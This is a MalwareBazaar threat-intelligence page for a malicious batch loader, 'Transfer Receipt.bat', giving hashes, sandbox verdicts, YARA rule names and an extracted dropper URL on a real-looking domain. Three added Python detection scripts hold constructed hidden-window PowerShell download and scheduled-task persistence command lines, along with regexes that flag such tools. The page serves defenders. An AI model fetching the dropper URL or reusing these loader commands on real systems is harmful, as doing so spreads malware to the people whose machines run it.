MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 52ecec3ddf31df410a7e65bf5149f3177eca01d142d9dbed7a198553ca1a1236. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 11



SHA256 hash: 52ecec3ddf31df410a7e65bf5149f3177eca01d142d9dbed7a198553ca1a1236
SHA3-384 hash: 2a9db6a603fb6e1e99af70a37eabbe5fb31cd1acc4c363e7bc84e315fb54a2ba7c871dd46732a6690148fa22ee1a22c5
SHA1 hash: aeef4bf4270775cef6402054e42f5d3578cbe3f7
MD5 hash: ca6fa6e5a499456e93060e04e3334b7b
humanhash: carbon-gee-sixteen-failed
File name: Transfer Receipt.bat
Download: download sample
File size: 58'109 bytes
First seen: 2026-02-02 22:00:53 UTC
Last seen: Never
File type: Batch (bat)
MIME type: text/plain
ssdeep: 1536:bilkmyopF4ONhopF4ONhopF4ONhopF4ONhopF4ONv:bivpFopFopFopFopF1
TLSH: T12D43C504497BCA3612E0AC6E47DBDF26E128AB543B186F68BC1909DE47CEF062DDD705
Magika: batch
Reporter: James_inthe_box
Tags: bat exe

Intelligence


File Origin
# of uploads: 1
# of downloads: 113
Origin country: US
Vendor Threat Intelligence

No detections

Malware family: n/a
ID: 1
File name: Transfer Receipt.bat
Verdict: Malicious activity
Analysis date: 2026-02-02 22:01:45 UTC
Tags: stego payload loader reverseloader

Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample

Result
Verdict: Malware
Maliciousness:
Behaviour
Running batch commands
Launching cmd.exe command interpreter
Launching a process
Creating a file
DNS request
Enabling autorun by creating a file

Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: cmd lolbin powershell

Verdict: Malicious
Labeled as: PowerShell/TrojanDownloader.Agent

Verdict: Malicious
File Type: unix shell
First seen: 2026-02-02T19:02:00Z UTC
Last seen: 2026-02-04T08:39:00Z UTC
Hits: ~10
Detections: PDM:Trojan.Win32.Generic PDM:Trojan.Win32.GenAutorunSchedulerTaskRun.c Trojan.Win32.Gasti.c

Threat name: Script.Trojan.Heuristic
Status: Malicious
First seen: 2026-02-02 22:01:13 UTC
File Type: Text (Batch)
AV detection: 6 of 38 (15.79%)
Threat level: 2/5

Result
Malware family: n/a
Score: 10/10
Tags: defense_evasion discovery execution
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System Location Discovery: System Language Discovery
Hide Artifacts: Hidden Window
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
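The behaviours the sandboxes report for this sample (cmd.exe running a .bat, PowerShell with a hidden window, a network request, persistence through an autorun entry or scheduled task) can be checked for in process-creation telemetry. The script below is an added example and is not code from this page, from the sample, or from any vendor's detection engine. The events it scans are constructed to resemble Sysmon Event ID 1 records; the paths, task name and URL in them are made up and are not taken from the sample.

```python
"""Triage process-creation events for a batch-file loader chain.

Added example, not code from the MalwareBazaar page or from any vendor.
Events are constructed (hypothetical) Sysmon-style records: pid, parent
pid, image path, command line. Nothing here comes from the real sample.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


# Constructed sample events (hypothetical; not from the real sample).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c ""C:\Users\victim\Downloads\Transfer Receipt.bat""'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
              "\"(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.png','C:\\Users\\Public\\x.png')\""),
    ProcEvent(400, 300, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /SC ONLOGON /TN Updater /TR "powershell.exe -w hidden -f C:\Users\Public\run.ps1" /F'),
    ProcEvent(500, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

# Signals, each mapped to the ATT&CK technique the sandbox labels above use.
BATCH_RE = re.compile(r"\.(?:bat|cmd)\b", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b", re.I)
PERSIST_RE = re.compile(
    r"schtasks(?:\.exe)?\s+/create|reg(?:\.exe)?\s+add\s+\S*\\run\b|\\Startup\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(events, pid):
    """Return [self, parent, grandparent, ...] for a pid."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        e = by_pid[pid]
        chain.append(e)
        pid = e.ppid
    return chain


def triage(events):
    """Return (technique, pid) findings for every event that trips a signal."""
    findings = []
    for e in events:
        chain = ancestors(events, e.pid)
        # Is there a cmd.exe running a batch file somewhere above this process?
        from_batch = any(basename(a.image) == "cmd.exe" and BATCH_RE.search(a.cmdline)
                         for a in chain[1:])
        if basename(e.image) in ("powershell.exe", "pwsh.exe") and from_batch:
            findings.append(("T1059.001 PowerShell spawned from batch file", e.pid))
        if HIDDEN_RE.search(e.cmdline):
            findings.append(("T1564.003 Hidden window", e.pid))
        if DOWNLOAD_RE.search(e.cmdline):
            findings.append(("T1105 Remote file download", e.pid))
        if PERSIST_RE.search(e.cmdline):
            findings.append(("T1053.005/T1547.001 Autorun persistence", e.pid))
    return findings


def verdict(events):
    """Three or more distinct techniques in one host's events is treated as
    likely malicious; the threshold is an assumption for this example."""
    techniques = {t.split()[0] for t, _ in triage(events)}
    label = "likely malicious" if len(techniques) >= 3 else "inconclusive"
    return label, sorted(techniques)


if __name__ == "__main__":
    for technique, pid in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {technique}")
    print(verdict(SAMPLE_EVENTS))
```

The hidden-window regex also fires on the scheduled task's own action string (pid 400), which is the point: the persistence entry re-launches PowerShell hidden on every logon, so both the creator and the task body deserve a finding.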
Malware Config
Dropper Extraction: https://uniworldrivercruises-co.uk/optimized_MSI.png

Please note that we are no longer able to provide a coverage score for Virus Total.
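The sandbox tags this sample as a stego payload loader and the extracted dropper URL ends in .png. One common way a loader hides a payload in an image is to append it after the PNG's final IEND chunk, which image viewers ignore. The script below is an added example, not code from this page or from the sample's author: it walks the chunk structure, verifies each CRC and reports any trailing bytes, together with their entropy and whether they start with an MZ header. It does not detect payloads hidden inside the pixel data itself. The PNG it inspects is constructed in code (a 1x1 RGB image) so the script runs offline; nothing here is derived from the real optimized_MSI.png.

```python
"""Check a PNG for data appended after its IEND chunk.

Added example; not from the MalwareBazaar page, any vendor, or the sample.
The PNG below is constructed (a valid 1x1 RGB image) for offline testing.
"""
import math
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A valid 1x1 8-bit RGB PNG, built here as the constructed sample."""
    # width, height, bit depth, colour type (2 = RGB), compression, filter, interlace
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    scanline = b"\x00" + b"\x00\x00\x00"   # filter byte + one black pixel
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline))
            + _chunk(b"IEND", b""))


def parse_png(data: bytes):
    """Walk chunks up to IEND. Returns (chunks, trailer): chunks is a list of
    (type, length, crc_ok); trailer is every byte after the IEND chunk."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    chunks = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_bytes) != 4:
            raise ValueError(f"truncated {ctype!r} chunk at offset {pos}")
        crc_ok = (zlib.crc32(ctype + body) & 0xFFFFFFFF) == struct.unpack(">I", crc_bytes)[0]
        chunks.append((ctype, length, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: near 8.0 for compressed or encrypted data, lower for text."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def inspect_png(data: bytes) -> dict:
    """Summarise chunk layout and anything that follows IEND."""
    chunks, trailer = parse_png(data)
    return {
        "chunks": [c[0].decode("latin-1") for c in chunks],
        "crc_errors": [c[0].decode("latin-1") for c in chunks if not c[2]],
        "trailer_len": len(trailer),
        "trailer_entropy": round(shannon_entropy(trailer), 2),
        "trailer_is_pe": trailer.startswith(b"MZ"),
        "suspicious": len(trailer) > 0,
    }


if __name__ == "__main__":
    clean = minimal_png()
    # Constructed "payload": a fake MZ header followed by filler bytes.
    tampered = clean + b"MZ" + bytes(range(256))
    for name, blob in (("clean", clean), ("tampered", tampered)):
        print(name, inspect_png(blob))
```

A CRC failure on an IDAT or ancillary chunk is worth reporting separately: some loaders overwrite chunk bodies rather than appending, and a viewer will still render the image while the checksum no longer matches.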

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: DetectEncryptedVariants
Author: Zinyth
Description: Detects 'encrypted' in ASCII, Unicode, base64, or hex-encoded
Rule name: obfuscated_BAT
Author: @warz_s
Description: Identifies obfuscated BAT files
Reference: https://github.com/secwarz/YaraRules
Rule name: RANSOMWARE
Author: ToroGuitar
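The first rule's description, matching one keyword in ASCII, Unicode (UTF-16LE), base64 and hex, hides a detail a rule author has to get right: base64 packs three bytes into four characters, so the encoding of a substring depends on its byte offset modulo 3 within the surrounding data, and a single base64 literal misses two of the three alignments. The script below is an added example, not the rule's own source and not code from this page. It generates the three base64 fragments the way YARA's `base64` string modifier does (prefix 0, 1 or 2 bytes, encode, trim the characters that depend on unknown neighbours), adds the base64-of-UTF-16LE form that `powershell -EncodedCommand` produces, and scans a constructed buffer for all of them; the buffer is made up and not taken from the sample.

```python
"""Encoded-keyword variants of the kind DetectEncryptedVariants must match.

Added example; not the YARA rule's source and not code from the page.
The scanned buffer is constructed, not taken from the sample.
"""
import base64
import re


def base64_variants(word: bytes) -> set:
    """The three base64 fragments that match `word` at any alignment.
    For offset k in 0..2: prepend k bytes, encode, and keep only the
    characters whose six bits come entirely from `word`."""
    out = set()
    for k in range(3):
        enc = base64.b64encode(b"\x00" * k + word + b"\x00" * 2).decode()
        start = -(-8 * k // 6)                 # ceil(8k / 6)
        end = (8 * k + 8 * len(word)) // 6     # floor((8k + 8n) / 6)
        out.add(enc[start:end])
    return out


def build_patterns(word: bytes) -> dict:
    """Byte patterns per encoding: the rule's ASCII / Unicode / base64 / hex,
    plus base64 of the UTF-16LE form (what powershell -EncodedCommand uses)."""
    wide = word.decode().encode("utf-16-le")
    return {
        "ascii": {word},
        "wide": {wide},
        "hex": {word.hex().encode(), word.hex().upper().encode()},
        "base64": {v.encode() for v in base64_variants(word)},
        "base64wide": {v.encode() for v in base64_variants(wide)},
    }


def scan(buf: bytes, word: bytes = b"encrypted") -> list:
    """Return sorted (encoding, offset) hits for every pattern."""
    hits = set()
    for encoding, patterns in build_patterns(word).items():
        for pat in patterns:
            for m in re.finditer(re.escape(pat), buf):
                hits.add((encoding, m.start()))
    return sorted(hits)


def matches_at_any_offset(word: bytes, max_offset: int = 6) -> bool:
    """Self-check: the variants must hit wherever `word` sits in the data."""
    variants = base64_variants(word)
    for off in range(max_offset):
        enc = base64.b64encode(b"X" * off + word + b"YY").decode()
        if not any(v in enc for v in variants):
            return False
    return True


# Constructed buffer resembling lines of an obfuscated batch/PowerShell
# loader; each line carries the keyword in a different encoding.
SAMPLE = b"".join([
    b"set key=encrypted\r\n",
    b"title " + "encrypted".encode("utf-16-le") + b"\r\n",
    b"set u=" + base64.b64encode(b"the file is encrypted ok") + b"\r\n",
    b"powershell -enc " + base64.b64encode("Write-Host encrypted".encode("utf-16-le")) + b"\r\n",
    b"echo " + b"encrypted".hex().encode() + b"\r\n",
])

if __name__ == "__main__":
    for encoding, offset in scan(SAMPLE):
        print(f"{encoding:11} at offset {offset}")
    print("base64 variants:", sorted(base64_variants(b"encrypted")))
```

In a YARA rule the same coverage is written as `$a = "encrypted" ascii wide`, `$b = "encrypted" base64 base64wide` and a hex string for the hex form; the trimming shown in `base64_variants` is what the `base64` modifier performs for you.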

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments